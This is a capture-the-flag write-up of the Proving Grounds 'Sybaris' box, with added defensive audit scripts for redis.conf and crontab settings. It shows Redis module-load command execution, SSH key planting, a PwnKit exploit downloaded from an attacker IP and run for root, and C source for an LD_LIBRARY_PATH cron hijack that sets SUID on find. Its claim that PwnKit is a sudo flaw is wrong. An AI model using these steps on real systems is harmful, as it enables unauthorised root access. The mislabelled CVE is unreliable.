Security Analyst | Security Researcher | CRTP

Proving Grounds Practice: Sybaris

Proving Grounds Practice - Sybaris CTF writeup.

Nmap

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.2
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/7.3.22)
6379/tcp open  redis   Redis key-value store 5.0.9

21/tcp open ftp vsftpd 3.0.2

Anonymous login succeeds, but no directories are found in the listing.

80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.22)

Nothing here…

6379/tcp open redis Redis key-value store 5.0.9

Upload the module .so file to the remote machine through FTP (the anonymous account can write to /var/ftp/pub), then use redis-cli to load the uploaded module with MODULE LOAD; the module's command gives command execution as the Redis user.

naveenj@hackerspace:[21:42]~/proving_grounds/Sybaris$ redis-cli -h 192.168.209.93
192.168.209.93:6379> MODULE LOAD /var/ftp/pub/exp.so
OK
192.168.209.93:6379> system.exe "id"
(error) ERR unknown command `system.exe`, with args beginning with: `id`, 
192.168.209.93:6379> module list
1) 1) "name"
   2) "system"
   3) "ver"
   4) (integer) 1
192.168.209.93:6379> system.exec "whoami;id;hostname;uname -a"
"pablo\nuid=1000(pablo) gid=1000(pablo) groups=1000(pablo)\nsybaris\nLinux sybaris 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\n"
  • Now copy the local id_rsa.pub file to the remote machine via FTP as authorized_keys.

  • Run the copy command through system.exec to copy /var/ftp/pub/authorized_keys to /home/pablo/.ssh/authorized_keys. Ensure the .ssh folder has been created before copying the key.

  • Cross-check the file using the redis-cli system.exec command and SSH in as the user.
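The foothold chain above (an anonymous-writable FTP directory plus an unauthenticated, network-reachable Redis that still accepts MODULE LOAD) comes down to a few redis.conf settings. The audit script below is an added example for this writeup, not part of the original post or of Redis itself. It parses a redis.conf text and flags the settings that make the chain possible, with a constructed weak configuration beside a hardened one; the password value is a placeholder. The rename-command approach matches Redis 5.x, the version seen in the Nmap scan.

```python
"""Audit redis.conf for the settings that expose MODULE LOAD to the network.

Added example for this writeup; the two configs below are constructed.
Applies to Redis 5.x, where removing a command is done with rename-command.
"""
from typing import Dict, List

# Constructed: the kind of config that makes the Sybaris foothold possible.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass is commented out, so any client may issue MODULE LOAD
"""

# Constructed: the same server, hardened. The password is a placeholder.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command MODULE ""
rename-command CONFIG ""
"""


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive (lower-cased) to the list of its argument strings.

    Directives such as rename-command may appear several times, so values
    are lists; comments and blank lines are skipped.
    """
    directives: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        args = parts[1].strip() if len(parts) > 1 else ""
        directives.setdefault(key, []).append(args)
    return directives


def disabled_commands(conf: Dict[str, List[str]]) -> List[str]:
    """Return command names renamed to the empty string (i.e. removed)."""
    disabled = []
    for args in conf.get("rename-command", []):
        parts = args.split(None, 1)
        if len(parts) == 2 and parts[1].strip() in ('""', "''", ""):
            disabled.append(parts[0].upper())
    return disabled


def audit_redis_conf(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing flagged."""
    conf = parse_redis_conf(text)
    findings: List[str] = []

    # No bind directive means "listen on every interface" in Redis 5.
    binds = [b.split() for b in conf.get("bind", [])]
    if not binds or any(addr in ("0.0.0.0", "*", "::") for b in binds for addr in b):
        findings.append("bind: Redis listens on all interfaces")

    # protected-mode defaults to yes; only an explicit 'no' turns it off.
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode: disabled")

    # requirepass absent or empty means unauthenticated access.
    passwords = conf.get("requirepass", [])
    if not passwords or passwords[-1].strip('"\'') == "":
        findings.append("requirepass: no password configured")

    # MODULE LOAD reads an arbitrary .so from disk; it should be unreachable.
    if "MODULE" not in disabled_commands(conf):
        findings.append("rename-command: MODULE command still reachable")

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]", audit_redis_conf(text) or "no findings")
```

Run it against a real redis.conf by passing the file contents to audit_redis_conf; an empty result means none of the four conditions the writeup relied on is present. Removing MODULE only matters if the file-write half of the chain (here, anonymous FTP upload) is also closed, since a writable path plus a live MODULE command is what turns a Redis login into code execution.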

Privilege Escalation

Sudo version vulnerable to CVE-2021-4034 (PwnKit).

[pablo@sybaris tmp]$ wget http://192.168.45.174/CVE-2021-4034.py -O exploit.py
--2023-10-29 22:01:50--  http://192.168.45.174/CVE-2021-4034.py
Connecting to 192.168.45.174:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: ‘exploit.py’

100%[===================================================================================================================================================>] 3,262       --.-K/s   in 0.003s  

2023-10-29 22:01:51 (1.09 MB/s) - ‘exploit.py’ saved [3262/3262]

[pablo@sybaris tmp]$ which python
/usr/bin/python
[pablo@sybaris tmp]$ python exploit.py 
[+] Creating shared library for exploit code.
[+] Calling execve()
[root@sybaris tmp]# cd /root
[root@sybaris root]#

Alternative

[pablo@sybaris ~]$ cat /etc/crontab 
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
  *  *  *  *  * root       /usr/bin/log-sweeper

Abuse LD_LIBRARY_PATH: the cron job runs /usr/bin/log-sweeper as root every minute with the LD_LIBRARY_PATH set above, so a shared library placed in one of those directories is loaded by a root process.

https://atom.hackstreetboys.ph/linux-privilege-escalation-environment-variables/
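From the defender's side, the crontab above is the thing to audit: a job running as root every minute while /etc/crontab sets an LD_LIBRARY_PATH that reaches outside the standard library directories. The script below is an added example for this writeup, not part of the original post or of any distribution tooling. It parses crontab text and, for every directory on the LD_LIBRARY_PATH that root jobs inherit, reports entries that are missing, not owned by root, or writable by group or other. The ownership and modes in SAMPLE_DIRS are constructed for the demonstration (the writeup does not state which directory on the box was writable); on a live host call audit_cron_ld_library_path without the stat_fn argument and it uses os.stat.

```python
"""Flag LD_LIBRARY_PATH directories that root cron jobs would trust.

Added example for this writeup. The crontab text is taken from the box;
the directory ownership and modes in SAMPLE_DIRS are constructed.
"""
import os
import re
import stat
from typing import Callable, Dict, List, NamedTuple, Tuple


class DirInfo(NamedTuple):
    exists: bool
    owner_uid: int = 0
    mode: int = 0o755


def real_stat(path: str) -> DirInfo:
    """Look a directory up on the live filesystem."""
    try:
        st = os.stat(path)
    except OSError:
        return DirInfo(False)
    return DirInfo(True, st.st_uid, stat.S_IMODE(st.st_mode))


# The LD_LIBRARY_PATH and root job from the Sybaris /etc/crontab.
SAMPLE_CRONTAB = """
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
# *  *  *  *  * user-name  command to be executed
  *  *  *  *  * root       /usr/bin/log-sweeper
"""

# Constructed permissions: two safe system dirs, one owned by an ordinary
# user (uid 1000) and one world-writable. Not the real state of the box.
SAMPLE_DIRS: Dict[str, DirInfo] = {
    "/usr/lib": DirInfo(True, 0, 0o755),
    "/usr/lib64": DirInfo(True, 0, 0o755),
    "/usr/local/lib/dev": DirInfo(True, 1000, 0o755),
    "/usr/local/lib/utils": DirInfo(True, 0, 0o777),
}


def sample_stat(path: str) -> DirInfo:
    """Stat replacement that answers from SAMPLE_DIRS, so the demo runs offline."""
    return SAMPLE_DIRS.get(path, DirInfo(False))


_ENV_LINE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")


def parse_crontab(text: str) -> Tuple[Dict[str, str], List[Tuple[str, str]]]:
    """Split a system crontab into (env assignments, [(user, command), ...])."""
    env: Dict[str, str] = {}
    jobs: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _ENV_LINE.match(line)
        if m:
            env[m.group(1)] = m.group(2).strip().strip('"')
            continue
        fields = line.split(None, 6)  # five time fields, user, command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return env, jobs


def audit_cron_ld_library_path(
    text: str, stat_fn: Callable[[str], DirInfo] = real_stat
) -> List[str]:
    """One finding per LD_LIBRARY_PATH entry that a non-root user could control."""
    env, jobs = parse_crontab(text)
    ld_path = env.get("LD_LIBRARY_PATH", "")
    root_jobs = [cmd for user, cmd in jobs if user == "root"]
    if not ld_path or not root_jobs:
        return []
    findings: List[str] = []
    for entry in ld_path.split(":"):
        if entry == "":
            findings.append("empty entry: the job's working directory is searched")
            continue
        info = stat_fn(entry)
        if not info.exists:
            findings.append(f"{entry}: does not exist (creatable if its parent is writable)")
        elif info.owner_uid != 0:
            findings.append(f"{entry}: owned by uid {info.owner_uid}, not root")
        elif info.mode & 0o022:
            findings.append(f"{entry}: writable by group/other (mode {info.mode:o})")
    return findings


if __name__ == "__main__":
    for finding in audit_cron_ld_library_path(SAMPLE_CRONTAB, sample_stat):
        print(finding)
```

The same check applies to any environment variable that changes library or binary lookup for a root job (PATH, LD_PRELOAD); the fix on the host side is to drop the non-standard entries from /etc/crontab and keep every directory that remains root-owned and mode 755 or tighter.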

Exploit

#define _GNU_SOURCE          /* setresuid() is a GNU extension in unistd.h */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs automatically when the dynamic loader maps this library. */
static void hijack(void) __attribute__((constructor));

static void hijack(void) {
        /* Clear the variable so the shell spawned by system() does not load this library again. */
        unsetenv("LD_LIBRARY_PATH");
        setresuid(0,0,0);
        system("chmod u+s /usr/bin/find");
}

Compile the exploit as a shared library, then wait for the cron job to run:

gcc -o utils.so -shared -fPIC exploit.c

[pablo@sybaris tmp]$ ls -al /usr/bin/find
-rwsr-sr-x. 1 root root 199304 Oct 30  2018 /usr/bin/find   #SUID bit set
[pablo@sybaris tmp]$
[pablo@sybaris tmp]$ /usr/bin/find . -exec /bin/sh -p \; -quit

Note that after the exploit has run, the SUID bit has been set on the find binary.

Root Obtained

For more insights and updates, follow me on Twitter: @thevillagehacker.